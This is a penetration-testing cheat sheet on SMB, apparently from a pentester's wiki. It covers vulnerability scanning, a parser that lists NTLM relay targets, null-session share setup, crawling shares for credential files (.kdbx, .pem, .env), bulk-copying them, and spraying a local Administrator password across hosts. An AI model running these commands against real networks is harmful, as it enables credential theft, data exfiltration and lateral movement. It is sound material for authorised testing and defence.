# SMB

Check for SMB vulnerabilities with Nmap:

```
$ sudo nmap -sV --script-args=unsafe=1 --script smb-os-discovery 10.10.13.37 -p139,445
$ sudo nmap -n -Pn -sV --script 'smb-vuln*' 10.10.13.37 -p445
```

Check if SMB Signing is enabled with CME:

```
$ cme smb smb.txt | grep -a 'signing:False'
```
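Hosts that report `signing:False` are the usual candidates for NTLM relay, so it pays to turn the CME output into a clean target list rather than eyeballing the grep. The parser below is an added example (not part of the original page or of CrackMapExec); the four output lines are constructed to mimic CME's `smb` line format, and the names, domains and addresses in them are made up.

```python
#!/usr/bin/env python3
"""Parse `cme smb` output lines and pick out hosts with SMB signing disabled.

Added example, not from the original page or from CrackMapExec itself.
"""
import re
from typing import Dict, List

# Constructed sample of `cme smb smb.txt` output (hosts, domains and IPs are made up).
SAMPLE_CME_OUTPUT = """\
SMB         10.10.13.37     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:megacorp.local) (signing:True) (SMBv1:False)
SMB         10.10.13.38     445    WS01             [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:megacorp.local) (signing:False) (SMBv1:False)
SMB         10.10.13.39     445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:megacorp.local) (signing:False) (SMBv1:True)
SMB         10.10.13.40     445    NAS01            [*] Unix - Samba (name:NAS01) (domain:MEGACORP) (signing:False) (SMBv1:False)
"""

# Columns: protocol, ip, port, hostname, "[*]", banner, then the (key:value) fields.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<banner>.*?)"
    r"\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)"
    r"\s+\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


def parse_cme(output: str) -> List[Dict[str, object]]:
    """Return one dict per recognised host line; unrelated lines are skipped."""
    hosts: List[Dict[str, object]] = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d: Dict[str, object] = m.groupdict()
        d["signing"] = d["signing"] == "True"
        d["smbv1"] = d["smbv1"] == "True"
        hosts.append(d)
    return hosts


def relay_targets(hosts: List[Dict[str, object]]) -> List[str]:
    """IPs with signing disabled: a relayed NTLM authentication is accepted over SMB there."""
    return [str(h["ip"]) for h in hosts if not h["signing"]]


def smbv1_hosts(hosts: List[Dict[str, object]]) -> List[str]:
    """IPs still speaking SMBv1, worth a second look with the smb-vuln* scripts."""
    return [str(h["ip"]) for h in hosts if h["smbv1"]]


if __name__ == "__main__":
    parsed = parse_cme(SAMPLE_CME_OUTPUT)
    print("relay targets:")
    print("\n".join(relay_targets(parsed)))
    print("SMBv1 hosts:")
    print("\n".join(smbv1_hosts(parsed)))
```

Feed it real output with `cme smb smb.txt | tee cme.log` and `parse_cme(open('cme.log').read())`; the `grep -a` in the one-liner above is there for the same reason the parser skips lines that do not match (CME mixes in colour codes and status lines).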

## Fingerprint

* <https://book.hacktricks.xyz/pentesting/pentesting-smb#smb-server-version>

Enumerate the Samba version. The version string (e.g. `Samba 4.13.5`) is only sent in the NativeLanMan field of an SMB1 Session Setup response and has no SMB2/3 equivalent, so this works against old Samba installs that still serve SMB1, and the client has to be forced to speak a legacy dialect (for security reasons modern clients will not initiate a connection with legacy protocols in use):

```
$ sudo ngrep -i -d eth0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
$ echo exit | smbclient -N -L 10.10.13.37 --option='client min protocol=LANMAN1'
```

## Mounting

Mount:

```
$ sudo mount -t cifs '//127.0.0.1/Users' /mnt/smb -v -o user=snovvcrash,[pass='Passw0rd!']
```

Status:

```
$ mount -v | grep 'type cifs'
$ df -k -F cifs
```

Unmount:

```
$ sudo umount /mnt/smb
```

## SMB Share with Null Authentication

* <https://sud0ru.ghost.io/what-makes-anonymous-pipes/>

Create an SMB share allowing null authentication (e.g. on a box you control, to serve or collect files). Note that the Windows registry changes below also loosen anonymous access restrictions for the whole host, not just for the share.

### Linux

{% code title="/etc/samba/smb.conf" %}

```
[global]
   map to guest = bad user
   server role = standalone server
   usershare allow guests = yes
   smb ports = 445

[smb]
   comment = Samba
   path = /srv/smb
   guest ok = yes
   read only = no
   browsable = yes
   force user = nobody
```

{% endcode %}

```
$ sudo service smbd restart
$ sudo chown -R nobody:root /srv/smb/
$ sudo chmod -R 777 /srv/smb/
```

### Windows

* <https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer>

```
PS > mkdir C:\share
PS > icacls C:\share\ /T /grant Anonymous` logon:r
PS > icacls C:\share\ /T /grant Everyone:r
PS > New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f  # this will overwrite existing NullSessionPipes
PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
```

## Hunt for Shares & Content

* <https://habr.com/ru/companies/ussc/articles/878340/>
* <https://github.com/s0i37/crawl>

### Toy Example

Collect a listing of files with size < 10 MB:

```
PS > cd \\megacorp.local\share
PS > Get-ChildItem -Recurse -File | ? { $_.Length -lt 10MB } | select -ExpandProperty FullName | Out-File share.txt
```

Filter only files of interest based on their extensions, print the stats as a Python dict:

```
$ dos2unix share.txt
$ cat share.txt | grep -e '\.7z$' -e '\.bak$' -e '\.bash_history$' -e '\.bat$' -e '\.bz2$' -e '\.cfg$' -e '\.cmd$' -e '\.conf$' -e '\.csv$' -e '\.doc$' -e '\.docm$' -e '\.docx$' -e '\.env$' -e '\.gz$' -e '\.ini$' -e '\.json$' -e '\.kdbx$' -e '\.key$' -e '\.odp$' -e '\.ods$' -e '\.odt$' -e '\.old$' -e '\.ovpn$' -e '\.p12$' -e '\.pdf$' -e '\.pem$' -e '\.pfx$' -e '\.ppt$' -e '\.pptx$' -e '\.ps1$' -e '\.rar$' -e '\.rtf$' -e '\.sh$' -e '\.tar$' -e '\.txt$' -e '\.vbs$' -e '\.xls$' -e '\.xlsm$' -e '\.xlsx$' -e '\.xml$' -e '\.yaml$' -e '\.yml$' -e '\.zip$' -e '\.zsh_history$' \
| awk -F. '{print $NF}' \
| sort \
| uniq -c \
| awk 'BEGIN { d = "{" } { d = d sprintf("\x27.%s\x27: %s, ", $2, $1) } END { d = substr(d, 1, length(d)-2); print d "}" }'
```

Generate a list of wanted files (Python) and copy them locally preserving original directory structure (PS):

{% tabs %}
{% tab title="Gen List " %}
{% code title="gen\_list.py" %}

```python
#!/usr/bin/env python3
# gen_list.py share.txt > files.txt

import sys
from random import sample

# paste the dict printed by the awk one-liner above, e.g. {'.docx': 1337, '.kdbx': 2, ...}
stats = { ... }

# cap for extensions with too many hits
MAX_PER_SUFFIX = 1000

with open(sys.argv[1]) as f:
    files = [line for line in f.read().splitlines() if line]

for suffix, count in stats.items():
    # match on the string tail (same as the grep above) rather than pathlib's .suffix,
    # which is empty for dotfiles such as .bash_history and would silently drop them
    arr = [line for line in files if line.endswith(suffix)]
    if count > MAX_PER_SUFFIX:
        arr = sample(arr, MAX_PER_SUFFIX)
    for a in arr:
        print(a)
```

{% endcode %}
{% endtab %}

{% tab title="Get Files" %}
{% code title="get\_files.ps1" %}

```powershell
$sourceBase = "\\megacorp.local\share"
$destinationBase = "C:\Share"
# one UNC path per line, as produced by gen_list.py; skip blank lines
$fileList = Get-Content "C:\Share\files.txt" -Encoding UTF8 | Where-Object { $_.Trim() }

foreach ($file in $fileList) {
    # path relative to the share root, e.g. \IT\backup\creds.kdbx
    $relativePath = $file.Substring($sourceBase.Length)
    $destFile = Join-Path $destinationBase $relativePath

    $destDir = Split-Path $destFile
    if (-not (Test-Path -LiteralPath $destDir)) {
        New-Item -ItemType Directory -Path $destDir -Force | Out-Null
    }

    # -LiteralPath so that names containing [ ] are not treated as wildcards
    Copy-Item -LiteralPath $file -Destination $destFile -Force
}
```

{% endcode %}
{% endtab %}
{% endtabs %}

### Tools

* <https://github.com/blacklanternsecurity/MANSPIDER>
* <https://github.com/SnaffCon/Snaffler>
* <https://github.com/mitchmoser/SharpShares>
* <https://github.com/punk-security/SMBeagle>
* <https://github.com/p0dalirius/FindUncommonShares>

## Tools

### rpcclient

Check for null authentication (rpcclient has no `-L`; an empty user with `-N` gives the null session):

```
$ rpcclient -N -U '' 127.0.0.1
```

With user creds:

```
$ rpcclient -U 'snovvcrash%Passw0rd!' 127.0.0.1
```

Local users info (from the rpcclient prompt):

```
rpcclient $> queryuser <RID>
rpcclient $> queryaliasmem builtin 0x220  # local admins (RID 544)
rpcclient $> queryaliasmem builtin 0x22B  # remote desktop users (RID 555)
```

### smbclient(.py)

Check for null authentication:

```
$ smbclient -N -L 127.0.0.1
$ smbclient -N '\\127.0.0.1\Data'
```

With user creds:

```
$ smbclient -U snovvcrash '\\127.0.0.1\Users' 'Passw0rd!'
```

Get all files recursively:

```
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
```

Local admin spray (check on which hosts a known local Administrator password is valid by listing `C$`):

```
$ cat use_c.cmd
use c$
ls Windows
$ for srv in `cat 445.tcp`; do proxychains4 -q smbclient.py Administrator:'Passw0rd!'@$srv -inputfile use_c.cmd |& grep -q Windows && echo $srv; done
```

### smbmap

```
$ smbmap -H 127.0.0.1
$ smbmap -H 127.0.0.1 -u anonymous
$ smbmap -H 127.0.0.1 -u '' -p ''
$ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName
$ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName -A .
```
